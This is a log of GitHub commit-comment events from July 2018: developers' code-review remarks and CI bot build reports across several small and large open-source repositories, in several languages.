{"id":"7948676018","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29667982,"position":1,"line":1,"path":"Lesson 3/station.rb","commit_id":"03d7eb608aea1d5a9e8655e60ed0fc439b54af28","created_at":"2018-07-11T08:55:18Z","updated_at":"2018-07-11T08:55:18Z","author_association":"NONE","body":"оставляю третий раз ссылкой на оригинал\r\n[вот здесь](https://github.com/aleksandrrusev/thinknetica/commit/58a682999ff73f8ebd4cd51b4559e6725ddaa4f7#diff-3e6f457a218d3f21ce2783d32bf46e33) "}},"created_at":"2018-07-11T08:55:18Z"}
{"id":"7948683777","type":"CommitCommentEvent","actor":{"login":"MageSlayer"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29667999,"position":null,"line":null,"path":null,"commit_id":"b560ce8f26db3af1a4f6c01cfa3ab2e2f64b33d1","created_at":"2018-07-11T08:56:46Z","updated_at":"2018-07-11T08:56:46Z","author_association":"OWNER","body":"I would expect \"Unsupported News-Item-Format: 2.0\" to be emitted first at import stage.\r\n"}},"created_at":"2018-07-11T08:56:46Z"}
{"id":"7948684259","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29668000,"position":null,"line":null,"path":null,"commit_id":"af94ebc1ebd6c932ca34b86875bdee888da437c1","created_at":"2018-07-11T08:56:51Z","updated_at":"2018-07-11T08:56:51Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-256](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-256-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T08:56:51Z"}
{"id":"7948692388","type":"CommitCommentEvent","actor":{"login":"MohammedKaludi"},"repo":{"name":"ahmedkaludi/accelerated-mobile-pages"},"payload":{"comment":{"id":29668021,"position":5,"line":5524,"path":"includes/options/admin-config.php","commit_id":"20a1d323e6c223fc6041a335e40881379f513455","created_at":"2018-07-11T08:58:20Z","updated_at":"2018-07-11T08:58:20Z","author_association":"COLLABORATOR","body":"Please use function_exists('yoast_breadcrumb') or the main class/function to check if it exists or not.\r\nif ( is_plugin_active() ) can create issues in Multisites or Whitelabel or Pro or other versions of the plugin.\r\n"}},"created_at":"2018-07-11T08:58:20Z"}
{"id":"7948692571","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668022,"position":15,"line":11,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T08:58:22Z","updated_at":"2018-07-11T08:58:22Z","author_association":"NONE","body":"Тут будет легче читаться, если перевернуть условия\r\n```\r\nunless stations.include?(station) || station.class != Station\r\n```"}},"created_at":"2018-07-11T08:58:22Z"}
{"id":"7948694238","type":"CommitCommentEvent","actor":{"login":"thaJeztah"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29668027,"position":24,"line":30,"path":"driver/driver_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T08:58:41Z","updated_at":"2018-07-11T08:58:41Z","author_association":"NONE","body":"Thanks! The wording was a bit ambiguous; so just checking "}},"created_at":"2018-07-11T08:58:41Z"}
{"id":"7948701336","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668042,"position":20,"line":16,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:00:00Z","updated_at":"2018-07-11T09:00:00Z","author_association":"NONE","body":"Давай, что-б звучало по английский назовем методы #first_station и #last_station"}},"created_at":"2018-07-11T09:00:00Z"}
{"id":"7948709491","type":"CommitCommentEvent","actor":{"login":"fujiwarat"},"repo":{"name":"vn-input/ibus-unikey"},"payload":{"comment":{"id":29668063,"position":51,"line":51,"path":"src/config/unikey_config.cpp","commit_id":"ae9319c8d0d212ac39dcb789e4bf52dbd33eb3c8","created_at":"2018-07-11T09:01:22Z","updated_at":"2018-07-11T09:01:22Z","author_association":"NONE","body":"I think\r\n+    data->cb = cb;\r\n+    data->user_data = user_data;"}},"created_at":"2018-07-11T09:01:22Z"}
{"id":"7948710687","type":"CommitCommentEvent","actor":{"login":"d3m3vilurr"},"repo":{"name":"TheOfficialFloW/Adrenaline"},"payload":{"comment":{"id":29668068,"position":null,"line":null,"path":null,"commit_id":"06dcde1aaad07199613b652357f002e8a89bd406","created_at":"2018-07-11T09:01:36Z","updated_at":"2018-07-11T09:01:36Z","author_association":"NONE","body":"cool. fast fix :)"}},"created_at":"2018-07-11T09:01:36Z"}
{"id":"7948713094","type":"CommitCommentEvent","actor":{"login":"kolyshkin"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29668071,"position":4,"line":9,"path":"sysx/chmod_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T09:02:03Z","updated_at":"2018-07-11T09:02:03Z","author_association":"NONE","body":"Yeah, I was on the edge about this; the camelcase version would be `AtFDCWD` (since both FD and CWD are acronyms). I favor the golang.org/x/sys/unix naming (i.e. `AT_FDCWD`) as\r\n1. it is almost-standard;\r\n2. it is identical to POSIX/C naming;\r\n3. it is more familiar to me personally because of 2.\r\n4. Go sources (src/syscall) internally use a similar but not exported name `_AT_FDCWD`.\r\n\r\nNow, initially when this code was written there were no golang.org/x/sys/unix, and the value of AT_SYMLINK_NOFOLLOW was not exposed by Go, so someone used `AtSymlinkNofollow`. I would rename it now (to `AT_SYMLINK_NOFOLLOW` to  follow the golang.org/x/sys/unix and C/POSIX name) but's part of public API now so a rename could break things for some external users of github.com/containerd/continuity/sysx (if there are any). "}},"created_at":"2018-07-11T09:02:03Z"}
{"id":"7948713502","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29668072,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T09:02:08Z","updated_at":"2018-07-11T09:02:08Z","author_association":"OWNER","body":"The only reason that might lead to a hash collision, is when Alice sends money to two remittance contracts which are based on the same combination of Carol's address and Bob's password. If she decided to do so, the sendMoney function will throws an error. Apart from this, isn't there just a very very slight chance of two combinations of (address, password) to result in the same hash ? Concatenating a third property to the existing combination, wouldn't make a difference in that case, it theoretically could still result in a hash collision. I am almost certain you are referring to something else.\r\n"}},"created_at":"2018-07-11T09:02:08Z"}
{"id":"7948714652","type":"CommitCommentEvent","actor":{"login":"xgerrmann"},"repo":{"name":"RigidWing/PX4_KiteX"},"payload":{"comment":{"id":29668073,"position":null,"line":null,"path":null,"commit_id":"4dc3510fa872f603a06a73301081f00b516d9c69","created_at":"2018-07-11T09:02:19Z","updated_at":"2018-07-11T09:02:19Z","author_association":"COLLABORATOR","body":"@aokholm  Why have you removed all these init files?"}},"created_at":"2018-07-11T09:02:19Z"}
{"id":"7948715232","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29668075,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-11T09:02:26Z","updated_at":"2018-07-11T09:02:26Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-11T09:02:26Z"}
{"id":"7948715449","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29668076,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-11T09:02:28Z","updated_at":"2018-07-11T09:02:28Z","author_association":"COLLABORATOR","body":"What about this?\r\n\r\n```php\r\n        $expr = Criteria::expr();\r\n        $criteria = Criteria::create()\r\n            ->andWhere($expr->orX(\r\n                $expr->neq('fID', $fv->getFile()->getFileID()),\r\n                $expr->neq('fvID', $fv->getFileVersionID())\r\n            ))\r\n            ->andWhere($expr->eq('fvPrefix', $fv->getPrefix()))\r\n            ->andWhere($expr->eq('fvFilename', $fv->getFileName()))\r\n        ;\r\n        $em = $this->app->make(EntityManagerInterface::class);\r\n        $repo = $em->getRepository(Version::class);\r\n        $safeToDelete = $repo->matching($criteria)->isEmpty();\r\n```"}},"created_at":"2018-07-11T09:02:28Z"}
{"id":"7948716378","type":"CommitCommentEvent","actor":{"login":"fujiwarat"},"repo":{"name":"vn-input/ibus-unikey"},"payload":{"comment":{"id":29668078,"position":61,"line":61,"path":"src/config/unikey_config.cpp","commit_id":"ae9319c8d0d212ac39dcb789e4bf52dbd33eb3c8","created_at":"2018-07-11T09:02:39Z","updated_at":"2018-07-11T09:02:39Z","author_association":"NONE","body":"You might consider\r\n```\r\n+    *result = g_variant_dup_string(value, NULL);\r\n```"}},"created_at":"2018-07-11T09:02:39Z"}
{"id":"7948721748","type":"CommitCommentEvent","actor":{"login":"alexesprit"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29668084,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-11T09:03:39Z","updated_at":"2018-07-11T09:03:39Z","author_association":"MEMBER","body":"Hi @James-W2!\r\n\r\nThe new version is out. It should be available in few minutes in Chrome Web Store and AMO.\r\n\r\nThe connectors (the file you tried to open) are supposed to be executed in Chrome environment. It's okay then use run them on Windows and see an error message box."}},"created_at":"2018-07-11T09:03:39Z"}
{"id":"7948723173","type":"CommitCommentEvent","actor":{"login":"amicarel"},"repo":{"name":"amicarel/guidaGit"},"payload":{"comment":{"id":29668087,"position":null,"line":null,"path":null,"commit_id":"670e2ed1caff0bcf0aa6e22498bbd7be4965280e","created_at":"2018-07-11T09:03:56Z","updated_at":"2018-07-11T09:03:56Z","author_association":"OWNER","body":"file doppio quindio lo cancello"}},"created_at":"2018-07-11T09:03:56Z"}
{"id":"7948723409","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29668089,"position":9,"line":9,"path":"card.rb","commit_id":"af6a293add400d28e09c3f627e3c2353f5b9b272","created_at":"2018-07-11T09:03:58Z","updated_at":"2018-07-11T09:03:58Z","author_association":"NONE","body":"Зачем карте что-то знать о колоде? Это должно быть в deck"}},"created_at":"2018-07-11T09:03:58Z"}
{"id":"7948725084","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29668091,"position":20,"line":17,"path":"src/app/showcase/growl-view/growl-view.component.ts","commit_id":"8ed60aa511fd18dbc11e73c33012fdffad90f72f","created_at":"2018-07-11T09:04:17Z","updated_at":"2018-07-11T09:04:17Z","author_association":"OWNER","body":"Андрей, можешь посмотреть пожалуйста, я не знаю, почему тут ошибка вылазит"}},"created_at":"2018-07-11T09:04:17Z"}
{"id":"7948726549","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29668102,"position":6,"line":6,"path":"Category.php","commit_id":"478b35203c85c4af13eecc341ffd4a69dffb77a8","created_at":"2018-07-11T09:04:32Z","updated_at":"2018-07-11T09:04:32Z","author_association":"NONE","body":"$name"}},"created_at":"2018-07-11T09:04:32Z"}
{"id":"7948727731","type":"CommitCommentEvent","actor":{"login":"Tapas15"},"repo":{"name":"Tapas15/USERNAME"},"payload":{"comment":{"id":29668105,"position":null,"line":null,"path":null,"commit_id":"ba5788a25330a434952f674cda9cb808f0992d37","created_at":"2018-07-11T09:04:45Z","updated_at":"2018-07-11T09:04:45Z","author_association":"OWNER","body":"\r\nscratch Pset0\r\nhttps://scratch.mit.edu/projects/236095679/"}},"created_at":"2018-07-11T09:04:45Z"}
{"id":"7948729245","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29668106,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-11T09:05:02Z","updated_at":"2018-07-11T09:05:02Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T09:05:02Z"}
{"id":"7948733673","type":"CommitCommentEvent","actor":{"login":"thaJeztah"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29668110,"position":4,"line":9,"path":"sysx/chmod_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T09:05:52Z","updated_at":"2018-07-11T09:05:52Z","author_association":"NONE","body":"Can we add _both_ and mark one `deprecated` ?"}},"created_at":"2018-07-11T09:05:52Z"}
{"id":"7948733985","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668112,"position":5,"line":17,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/model/Post.java","commit_id":"77efba94aec314d540c7a789140408b2cb1a56bd","created_at":"2018-07-11T09:05:55Z","updated_at":"2018-07-11T09:05:55Z","author_association":"NONE","body":"Oh it is so sad... the previous type and name was perfect. I would name this field as `score` 👍. And as far I can see this little change caused your issue with database. Do you remember my story about my 2 days long mysterious SQL error caused by a wrongly chosen name? `LIKE` is a valid SQL operator :(\r\nhttps://www.techonthenet.com/mysql/like.php"}},"created_at":"2018-07-11T09:05:55Z"}
{"id":"7948739118","type":"CommitCommentEvent","actor":{"login":"rappatic"},"repo":{"name":"rappatic/titaniumcss"},"payload":{"comment":{"id":29668134,"position":null,"line":null,"path":null,"commit_id":"40ddb41af2db802499a683f3428f42e0689e7ef3","created_at":"2018-07-11T09:06:51Z","updated_at":"2018-07-11T09:06:51Z","author_association":"OWNER","body":"Added a no-margin and no-padding declaration to the body"}},"created_at":"2018-07-11T09:06:51Z"}
{"id":"7948740233","type":"CommitCommentEvent","actor":{"login":"KEPASEV"},"repo":{"name":"KEPASEV/Base"},"payload":{"comment":{"id":29668137,"position":6,"line":5,"path":"Documents/ПриходнаяНакладная/Forms/ФормаДокумента/Ext/Form/Module.bsl","commit_id":"a082b410f5f75719ba1d91ed8232b71919520ff0","created_at":"2018-07-11T09:07:04Z","updated_at":"2018-07-11T09:07:04Z","author_association":"OWNER","body":"С хрена ли???\r\n"}},"created_at":"2018-07-11T09:07:04Z"}
{"id":"7948741921","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668139,"position":32,"line":26,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:07:23Z","updated_at":"2018-07-11T09:07:23Z","author_association":"NONE","body":"Ого) Тут сложно читается. Давай упростим. Во первых: если мы считаем, что stations содержит только станции - значит значит первую проверку (```station.class == Station```) можно отбросить. Объекта не класса Станция не будет в массиве станций. Дальше, давай мы сделаем ранний ретерн, если массив состоящий из первой и последней станций включает в себя удаляемую станцию."}},"created_at":"2018-07-11T09:07:23Z"}
{"id":"7948742797","type":"CommitCommentEvent","actor":{"login":"ZaidAmirMahdi10"},"repo":{"name":"ISBX/apprtc-ios"},"payload":{"comment":{"id":29668141,"position":null,"line":null,"path":null,"commit_id":"6ec7dd8970f32257c4fd97c1421207667950a9d6","created_at":"2018-07-11T09:07:32Z","updated_at":"2018-07-11T09:07:32Z","author_association":"NONE","body":"Hello dear, \r\n\r\nI am trying to build the  demo app but when I do, I cannot find those frameworks:\r\n\r\nPods_AppRTC.framework\r\nFLKAutoLayout.framework\r\nSocketRocket.framework\r\n\r\nCan you please help me with that? Thank you in advance. "}},"created_at":"2018-07-11T09:07:32Z"}
{"id":"7948743380","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29668144,"position":11,"line":11,"path":"deck.rb","commit_id":"af6a293add400d28e09c3f627e3c2353f5b9b272","created_at":"2018-07-11T09:07:39Z","updated_at":"2018-07-11T09:07:39Z","author_association":"NONE","body":"Deck это же колода, массива из карт, которые образуются путем смешения значений (ranks) и мастей (suites)"}},"created_at":"2018-07-11T09:07:39Z"}
{"id":"7948748094","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29668152,"position":51,"line":79,"path":"Category.php","commit_id":"478b35203c85c4af13eecc341ffd4a69dffb77a8","created_at":"2018-07-11T09:08:32Z","updated_at":"2018-07-11T09:08:32Z","author_association":"NONE","body":"if( intval($ID) > 0) {\r\n}\r\nelse {\r\n}"}},"created_at":"2018-07-11T09:08:32Z"}
{"id":"7948752300","type":"CommitCommentEvent","actor":{"login":"stephaniezpt"},"repo":{"name":"stephaniezpt/mon_premier_site_internet"},"payload":{"comment":{"id":29668161,"position":null,"line":null,"path":null,"commit_id":"734faa272bedc026f31e8081fab78c444dae5b01","created_at":"2018-07-11T09:09:20Z","updated_at":"2018-07-11T09:09:20Z","author_association":"OWNER","body":"changement plus de conflits"}},"created_at":"2018-07-11T09:09:20Z"}
{"id":"7948753299","type":"CommitCommentEvent","actor":{"login":"seagle0128"},"repo":{"name":"seagle0128/doom-modeline"},"payload":{"comment":{"id":29668162,"position":5,"line":1022,"path":"doom-modeline.el","commit_id":"501a930d32f236f08da6b787a69e2ff904c9c22f","created_at":"2018-07-11T09:09:32Z","updated_at":"2018-07-11T09:09:32Z","author_association":"OWNER","body":"And I put the global segment to the first of the right panel now. It looks nicer I think."}},"created_at":"2018-07-11T09:09:32Z"}
{"id":"7948753511","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668164,"position":32,"line":26,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:09:34Z","updated_at":"2018-07-11T09:09:34Z","author_association":"NONE","body":"Получается, что нам не нужна проверка, если станция включена в массив. Потому-что, если она не включена, то метод #delete вернет nil. (что нас устраивает)"}},"created_at":"2018-07-11T09:09:34Z"}
{"id":"7948754410","type":"CommitCommentEvent","actor":{"login":"manio"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29668165,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-11T09:09:46Z","updated_at":"2018-07-11T09:09:46Z","author_association":"NONE","body":"The problem you're describing is rather pointing me to this:\r\nhttps://github.com/octo/librouteros/commit/b020d5c871e57cc765abaf6d0a7721593e2bceed\r\n\r\nThe timeout here is just a workaround."}},"created_at":"2018-07-11T09:09:46Z"}
{"id":"7948758673","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668170,"position":24,"line":30,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/model/Post.java","commit_id":"77efba94aec314d540c7a789140408b2cb1a56bd","created_at":"2018-07-11T09:10:34Z","updated_at":"2018-07-11T09:10:34Z","author_association":"NONE","body":"Unfortunately this name is misleading. If I see a `get` function I expect go get a field/value from the object. I would name it `increaseScore()` or something like this."}},"created_at":"2018-07-11T09:10:34Z"}
{"id":"7948762763","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668177,"position":40,"line":31,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:11:20Z","updated_at":"2018-07-11T09:11:20Z","author_association":"NONE","body":"Выводить список промежуточных станций не сказанно в ТЗ"}},"created_at":"2018-07-11T09:11:20Z"}
{"id":"7948764252","type":"CommitCommentEvent","actor":{"login":"JeRoNZ"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29668183,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-11T09:11:36Z","updated_at":"2018-07-11T09:11:36Z","author_association":"NONE","body":"Yes, I guess that works too, although it's a bit harder to follow. I did try my solution and it appears to work, only deleting the file if there's only one reference to the prefix."}},"created_at":"2018-07-11T09:11:36Z"}
{"id":"7948766952","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668189,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:12:07Z","updated_at":"2018-07-11T09:12:07Z","author_association":"NONE","body":"Про ридеры писал выше в Route"}},"created_at":"2018-07-11T09:12:07Z"}
{"id":"7948771771","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29668197,"position":5,"line":102,"path":"src/Puppet/Runner/Preferences.hs","commit_id":"e58a79df58acb218d75b32b5f028053808489c82","created_at":"2018-07-11T09:13:00Z","updated_at":"2018-07-11T09:13:00Z","author_association":"COLLABORATOR","body":"Shouldn't this be the new `decodeFileThrow` ?\r\n```\r\n-- | A version of 'decodeFileEither' lifted to MonadIO\r\n--\r\n-- @since 0.8.31\r\ndecodeFileThrow :: (MonadIO m, FromJSON a) => FilePath -> m a\r\ndecodeFileThrow f = liftIO $ decodeFileEither f >>= either throwIO return\r\n```"}},"created_at":"2018-07-11T09:13:00Z"}
{"id":"7948772066","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668198,"position":25,"line":31,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/model/Post.java","commit_id":"77efba94aec314d540c7a789140408b2cb1a56bd","created_at":"2018-07-11T09:13:03Z","updated_at":"2018-07-11T09:13:03Z","author_association":"NONE","body":"There is a beautiful operator to increase an integer's value by one, `score++` . It is easier to read and you can save 3 characters compared to current state. "}},"created_at":"2018-07-11T09:13:03Z"}
{"id":"7948773923","type":"CommitCommentEvent","actor":{"login":"CptMcSplody"},"repo":{"name":"loot/skyrimse"},"payload":{"comment":{"id":29668200,"position":null,"line":null,"path":null,"commit_id":"971e491c325f56d6980e0d07b597e6a53108fde5","created_at":"2018-07-11T09:13:24Z","updated_at":"2018-07-11T09:13:24Z","author_association":"CONTRIBUTOR","body":"Actual link for template from issue Skyrim https://github.com/loot/skyrim/issues/143"}},"created_at":"2018-07-11T09:13:24Z"}
{"id":"7948775729","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29668203,"position":60,"line":88,"path":"Category.php","commit_id":"478b35203c85c4af13eecc341ffd4a69dffb77a8","created_at":"2018-07-11T09:13:45Z","updated_at":"2018-07-11T09:13:45Z","author_association":"NONE","body":"if( $row = mysqli_fetch_assoc($result) ) {\r\nreturn new self(.., .., .., ....);\r\n}"}},"created_at":"2018-07-11T09:13:45Z"}
{"id":"7948777798","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29668207,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-11T09:14:08Z","updated_at":"2018-07-11T09:14:08Z","author_association":"COLLABORATOR","body":"My code simply searches for other file versions (first `where`) that have the same `fvPrefix` and `fvFilename` (second and third `where`): if there aren't, the actual file can be deleted."}},"created_at":"2018-07-11T09:14:08Z"}
{"id":"7948777971","type":"CommitCommentEvent","actor":{"login":"kolyshkin"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29668210,"position":1,"line":1,"path":"sysx/chmod_unix.go","commit_id":"ec588492771b11c6197b2c1b95490b0bb380ad7f","created_at":"2018-07-11T09:14:10Z","updated_at":"2018-07-11T09:14:10Z","author_association":"NONE","body":"Yeah, makes sense, will update."}},"created_at":"2018-07-11T09:14:10Z"}
{"id":"7948779279","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668213,"position":9,"line":12,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/service/PostServiceImpl.java","commit_id":"77efba94aec314d540c7a789140408b2cb1a56bd","created_at":"2018-07-11T09:14:24Z","updated_at":"2018-07-11T09:14:24Z","author_association":"NONE","body":"Always good to see a service layer 🥇 "}},"created_at":"2018-07-11T09:14:24Z"}
{"id":"7948780429","type":"CommitCommentEvent","actor":{"login":"ratnesh83"},"repo":{"name":"ratnesh83/Angular-MultiSelect-DropDown"},"payload":{"comment":{"id":29668216,"position":null,"line":null,"path":null,"commit_id":"ce7e46bbe5a70f8f2209779383f1e71ed118ac97","created_at":"2018-07-11T09:14:37Z","updated_at":"2018-07-11T09:14:37Z","author_association":"OWNER","body":"### Angular MultiSelect DropDown"}},"created_at":"2018-07-11T09:14:37Z"}
{"id":"7948781873","type":"CommitCommentEvent","actor":{"login":"noplanman"},"repo":{"name":"diasporg/Poduptime"},"payload":{"comment":{"id":29668218,"position":4,"line":59,"path":"db/add.php","commit_id":"47efe5de8d732a9f96caf4a56cfdc9cb2925eacc","created_at":"2018-07-11T09:14:54Z","updated_at":"2018-07-11T09:14:54Z","author_association":"COLLABORATOR","body":"Whoops, how did this sneak in :flushed:\nWas refactoring the Logging class but then stopped because it didn't addmuch value.\nWhen logging gets more serious we'd switch to Monolog any way i think"}},"created_at":"2018-07-11T09:14:54Z"}
{"id":"7948782693","type":"CommitCommentEvent","actor":{"login":"KoltesDigital"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29668219,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-11T09:15:03Z","updated_at":"2018-07-11T09:15:03Z","author_association":"OWNER","body":"They can't anyway, the reason is the CORS settings and my requests don't come from a web domain. But I'm not sad, the whole thing was a hack :)\r\n\r\nStill, if I have time, I'll rewrite the whole principle. The idea is to use the [actual API](https://www.shadertoy.com/api) to retrieve the shader entry, and then to recreate a context with the same uniforms. Which is what @alexjc's [shadertoy-render](https://github.com/alexjc/shadertoy-render) does, but it hasn't been updated for a long time. So I could patch this one (e.g. adding support for multipass shaders). However, since I use @fand's [VEDA](https://veda.gl/) a lot nowadays, I guess I'll rather add support for importing shadertoy entries and recording directly into VEDA."}},"created_at":"2018-07-11T09:15:03Z"}
{"id":"7948785289","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29668223,"position":null,"line":null,"path":null,"commit_id":"536cef86f4d0a3526d33fd3feb54f03bead7fdd4","created_at":"2018-07-11T09:15:30Z","updated_at":"2018-07-11T09:15:30Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/my-journey-into-a-massive-posts-rebake-job/84816/21\n"}},"created_at":"2018-07-11T09:15:30Z"}
{"id":"7948791408","type":"CommitCommentEvent","actor":{"login":"sinloft"},"repo":{"name":"simcen/alert_manager"},"payload":{"comment":{"id":29668235,"position":null,"line":null,"path":null,"commit_id":"4e4c58de53b52024860678b457b9478ae6378d01","created_at":"2018-07-11T09:16:35Z","updated_at":"2018-07-11T09:16:35Z","author_association":"NONE","body":":) I struggeled with that aswell"}},"created_at":"2018-07-11T09:16:35Z"}
